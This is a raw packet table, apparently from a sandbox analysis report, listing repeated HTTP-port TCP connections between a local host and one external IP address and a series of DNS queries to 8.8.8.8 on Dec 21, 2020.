Dec 21, 2020 08:34:57.505839109 CET	49332	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.571326017 CET	80	49332	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.637568951 CET	80	49332	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.637723923 CET	49332	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.637784958 CET	49332	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.703340054 CET	80	49332	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.838169098 CET	49333	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.895917892 CET	80	49333	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.896020889 CET	49333	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.901391983 CET	49333	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:57.959213018 CET	80	49333	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:57.959319115 CET	49333	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.017071009 CET	80	49333	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.109519958 CET	80	49333	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.109699965 CET	49333	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.109719038 CET	49333	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.167366028 CET	80	49333	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.288851023 CET	49334	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.353961945 CET	80	49334	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.354149103 CET	49334	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.356885910 CET	49334	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.422040939 CET	80	49334	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.422141075 CET	49334	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.487234116 CET	80	49334	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.550988913 CET	80	49334	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.551207066 CET	49334	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.551264048 CET	49334	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.616569996 CET	80	49334	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.740102053 CET	49335	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.801512957 CET	80	49335	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.801626921 CET	49335	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.807713032 CET	49335	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.869088888 CET	80	49335	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.869191885 CET	49335	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.930576086 CET	80	49335	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.996237040 CET	80	49335	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:58.996313095 CET	49335	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:58.996360064 CET	49335	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.057704926 CET	80	49335	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.194282055 CET	49336	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.253142118 CET	80	49336	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.253370047 CET	49336	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.259529114 CET	49336	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.318279028 CET	80	49336	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.318394899 CET	49336	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.377012968 CET	80	49336	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.445801020 CET	80	49336	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.445902109 CET	49336	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.445947886 CET	49336	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.504544020 CET	80	49336	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.644684076 CET	49337	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.706618071 CET	80	49337	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.706737041 CET	49337	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.709543943 CET	49337	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.771472931 CET	80	49337	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.771585941 CET	49337	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.833417892 CET	80	49337	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.901983976 CET	80	49337	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:59.902091026 CET	49337	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.902139902 CET	49337	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:59.963973045 CET	80	49337	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.096786976 CET	49338	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.158049107 CET	80	49338	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.158138037 CET	49338	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.160897017 CET	49338	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.222248077 CET	80	49338	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.222340107 CET	49338	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.283680916 CET	80	49338	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.349518061 CET	80	49338	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.349621058 CET	49338	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.349961996 CET	49338	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.411582947 CET	80	49338	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.547410011 CET	49339	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.604835033 CET	80	49339	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.604945898 CET	49339	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.610924006 CET	49339	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.668287039 CET	80	49339	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.668387890 CET	49339	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.725759029 CET	80	49339	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.794681072 CET	80	49339	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.794836044 CET	49339	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.794888973 CET	49339	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:00.852297068 CET	80	49339	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:00.987325907 CET	49340	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.044464111 CET	80	49340	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.044595003 CET	49340	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.047354937 CET	49340	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.104295969 CET	80	49340	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.104419947 CET	49340	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.161254883 CET	80	49340	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.230403900 CET	80	49340	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.230514050 CET	49340	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.230545044 CET	49340	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.287384987 CET	80	49340	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.417355061 CET	49341	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.475147963 CET	80	49341	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.475275040 CET	49341	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.481208086 CET	49341	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.539221048 CET	80	49341	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.539381981 CET	49341	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.597016096 CET	80	49341	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.667486906 CET	80	49341	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.667640924 CET	49341	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.667701960 CET	49341	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.725415945 CET	80	49341	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.875179052 CET	49342	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.932338953 CET	80	49342	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.932468891 CET	49342	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.938677073 CET	49342	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:01.996174097 CET	80	49342	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:01.996361017 CET	49342	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.053734064 CET	80	49342	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.127676964 CET	80	49342	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.127783060 CET	49342	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.127826929 CET	49342	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.185658932 CET	80	49342	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.327075958 CET	49343	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.385831118 CET	80	49343	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.385906935 CET	49343	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.388885975 CET	49343	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.447525978 CET	80	49343	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.447591066 CET	49343	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.509448051 CET	80	49343	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.579013109 CET	80	49343	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.579104900 CET	49343	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.579140902 CET	49343	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.637718916 CET	80	49343	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.767360926 CET	49344	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.830624104 CET	80	49344	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.830779076 CET	49344	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.836599112 CET	49344	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.899688959 CET	80	49344	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:02.899816990 CET	49344	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:02.962822914 CET	80	49344	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:03.029088020 CET	80	49344	185.193.143.118	192.168.2.22
Dec 21, 2020 08:35:03.029232979 CET	49344	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:03.029273033 CET	49344	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:35:03.092305899 CET	80	49344	185.193.143.118	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2020 08:33:20.079046011 CET	52197	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:20.141259909 CET	53	52197	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:20.141686916 CET	52197	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:20.181081057 CET	53	52197	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:31.913495064 CET	53099	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:32.245913982 CET	53	53099	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:32.661679029 CET	52838	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:33.027492046 CET	53	52838	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:33.384108067 CET	61200	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:33.416837931 CET	53	61200	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:33.879810095 CET	49548	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:33.912573099 CET	53	49548	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:34.362772942 CET	55627	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:34.397540092 CET	53	55627	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:34.881009102 CET	56009	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:34.913418055 CET	53	56009	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:35.359441996 CET	61865	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:35.392252922 CET	53	61865	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:35.837912083 CET	55171	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:35.873585939 CET	53	55171	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:36.313498974 CET	52496	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:36.346338034 CET	53	52496	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:36.808887959 CET	57564	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:36.841499090 CET	53	57564	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:37.314598083 CET	63009	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:37.347301960 CET	53	63009	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:37.787421942 CET	59319	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:37.822774887 CET	53	59319	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:38.269783974 CET	53070	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:38.302434921 CET	53	53070	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:38.743330002 CET	59770	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:38.776042938 CET	53	59770	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:39.221379995 CET	61523	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:39.253777027 CET	53	61523	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:39.711550951 CET	62791	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:39.744498014 CET	53	62791	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:40.202322006 CET	50667	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:40.229345083 CET	53	50667	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:40.652861118 CET	54129	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:40.677072048 CET	53	54129	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:41.115207911 CET	65329	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:41.149358988 CET	53	65329	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:41.607522011 CET	60718	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:41.640346050 CET	53	60718	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:42.085715055 CET	49157	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:42.118233919 CET	53	49157	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:42.570028067 CET	57391	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:42.603332043 CET	53	57391	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:43.024233103 CET	61858	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:43.056792021 CET	53	61858	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:43.507846117 CET	62500	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:43.542844057 CET	53	62500	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:43.990227938 CET	51652	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:44.025953054 CET	53	51652	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:44.476102114 CET	62762	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:44.500294924 CET	53	62762	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:44.947941065 CET	56905	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:44.982953072 CET	53	56905	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:45.426358938 CET	54609	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:45.462071896 CET	53	54609	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:45.893923044 CET	58101	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:45.929359913 CET	53	58101	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:46.404953957 CET	64329	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:46.440226078 CET	53	64329	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:46.857896090 CET	64881	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:46.882116079 CET	53	64881	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:47.341500998 CET	55327	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:47.365688086 CET	53	55327	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:47.811341047 CET	59150	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:47.838496923 CET	53	59150	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:48.293976068 CET	63439	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:48.329663038 CET	53	63439	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:48.764221907 CET	65040	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:48.799899101 CET	53	65040	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:49.248095989 CET	61369	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:49.272435904 CET	53	61369	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:49.738286972 CET	65515	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:49.773880959 CET	53	65515	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:50.200308084 CET	60236	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:50.234957933 CET	53	60236	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:50.703052044 CET	53198	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:50.727616072 CET	53	53198	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:51.166956902 CET	50027	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:51.199632883 CET	53	50027	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:51.634434938 CET	59245	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:51.661459923 CET	53	59245	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:52.106240034 CET	55840	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:52.138839960 CET	53	55840	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:52.575071096 CET	61667	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:52.608187914 CET	53	61667	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:53.053771019 CET	63736	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:53.089116096 CET	53	63736	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:53.521665096 CET	59805	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:53.545923948 CET	53	59805	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:54.004151106 CET	62322	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:54.028563023 CET	53	62322	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:54.463464975 CET	52819	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:54.495980978 CET	53	52819	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:54.918165922 CET	51215	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:54.950864077 CET	53	51215	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:55.372256041 CET	60312	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:55.396764994 CET	53	60312	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:57.806827068 CET	63463	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:58.138356924 CET	53	63463	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:58.565279007 CET	62224	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:58.600277901 CET	53	62224	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:59.039273977 CET	59064	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:59.074902058 CET	53	59064	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:59.513793945 CET	59885	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:59.538171053 CET	53	59885	8.8.8.8	192.168.2.22
Dec 21, 2020 08:33:59.963618994 CET	63749	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:33:59.999243975 CET	53	63749	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:00.431229115 CET	50878	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:00.458333969 CET	53	50878	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:00.894161940 CET	58469	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:00.927617073 CET	53	58469	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:01.345640898 CET	54773	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:01.370101929 CET	53	54773	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:01.786082029 CET	52166	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:01.813256025 CET	53	52166	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:02.207808971 CET	54589	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:02.234920025 CET	53	54589	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:02.980644941 CET	58113	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:03.016529083 CET	53	58113	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:03.739376068 CET	53533	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:03.763997078 CET	53	53533	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:04.201909065 CET	57696	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:04.226470947 CET	53	57696	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:04.632169008 CET	51068	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:04.662421942 CET	53	51068	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:05.084239006 CET	52944	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:05.116772890 CET	53	52944	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:05.539611101 CET	56190	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:05.564255953 CET	53	56190	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:05.976373911 CET	63877	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:06.008991003 CET	53	63877	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:06.425539017 CET	62299	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:06.452527046 CET	53	62299	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:06.876219988 CET	53239	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:06.900445938 CET	53	53239	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:07.333338022 CET	62320	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:07.365592957 CET	53	62320	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:07.783689976 CET	61507	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:07.810790062 CET	53	61507	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:08.236664057 CET	53940	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:08.260979891 CET	53	53940	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:08.676565886 CET	59089	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:08.709247112 CET	53	59089	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:09.131469011 CET	51739	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:09.166901112 CET	53	51739	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:09.589118958 CET	53552	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:09.613442898 CET	53	53552	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:10.046735048 CET	61135	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:10.082566023 CET	53	61135	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:10.515592098 CET	49357	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:10.540024042 CET	53	49357	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:10.950223923 CET	53451	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:10.974487066 CET	53	53451	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:11.411515951 CET	62183	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:11.435686111 CET	53	62183	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:11.841891050 CET	61653	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:11.866249084 CET	53	61653	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:12.305572033 CET	56509	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:12.342263937 CET	53	56509	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:12.768889904 CET	62179	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:12.793176889 CET	53	62179	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:13.222127914 CET	54721	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:14.232207060 CET	54721	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:15.224958897 CET	53	54721	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:15.630001068 CET	59549	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:15.657253981 CET	53	59549	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:16.071230888 CET	50463	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:16.098458052 CET	53	50463	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:16.519520044 CET	59029	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:16.546869040 CET	53	59029	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:16.966084957 CET	60541	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:16.990459919 CET	53	60541	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:17.457360983 CET	62739	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:17.481856108 CET	53	62739	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:17.911499977 CET	62511	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:17.947513103 CET	53	62511	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:18.360188007 CET	54403	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:18.384497881 CET	53	54403	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:18.821360111 CET	62038	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:18.848465919 CET	53	62038	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:19.271018028 CET	50377	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:19.295341015 CET	53	50377	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:19.715977907 CET	59171	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:19.740425110 CET	53	59171	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:20.170018911 CET	59721	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:20.202665091 CET	53	59721	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:20.615250111 CET	54110	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:20.648192883 CET	53	54110	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:21.069551945 CET	65178	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:21.093951941 CET	53	65178	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:21.521275997 CET	57185	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:21.545727968 CET	53	57185	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:21.957238913 CET	51859	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:21.984266996 CET	53	51859	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:22.409060955 CET	63355	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:22.435983896 CET	53	63355	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:22.841989040 CET	59126	53	192.168.2.22	8.8.8.8
